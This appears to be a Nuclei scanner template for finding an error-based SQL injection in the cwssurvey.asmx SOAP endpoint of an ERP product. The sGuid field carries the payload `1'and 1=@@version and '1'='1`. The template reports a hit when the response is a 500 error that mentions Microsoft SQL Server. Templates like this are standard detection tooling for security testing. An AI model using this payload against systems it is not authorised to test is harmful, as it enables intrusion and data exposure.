id: ag-erp-cwssurvey-sqli
info:
  name: ag-erp-cwssurvey-sqli
  author: lemonlove7
  severity: high
http:
  - raw:
      - |-
        POST /enjoyRMIS_WS/WS/BaseInfo/cwssurvey.asmx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml; charset=utf-8
        Content-Length: 461
        Connection: close
        
        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                       xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                       xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
            <GetSurveyAnswerByGuid1 xmlns="http://tempuri.org/">
              <sGuid>1'and 1=@@version and '1'='1</sGuid>
              <sProvider></sProvider>
            </GetSurveyAnswerByGuid1>
          </soap:Body>
        </soap:Envelope>
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: body
        words:
          - Microsoft SQL Server
    matchers-condition: and
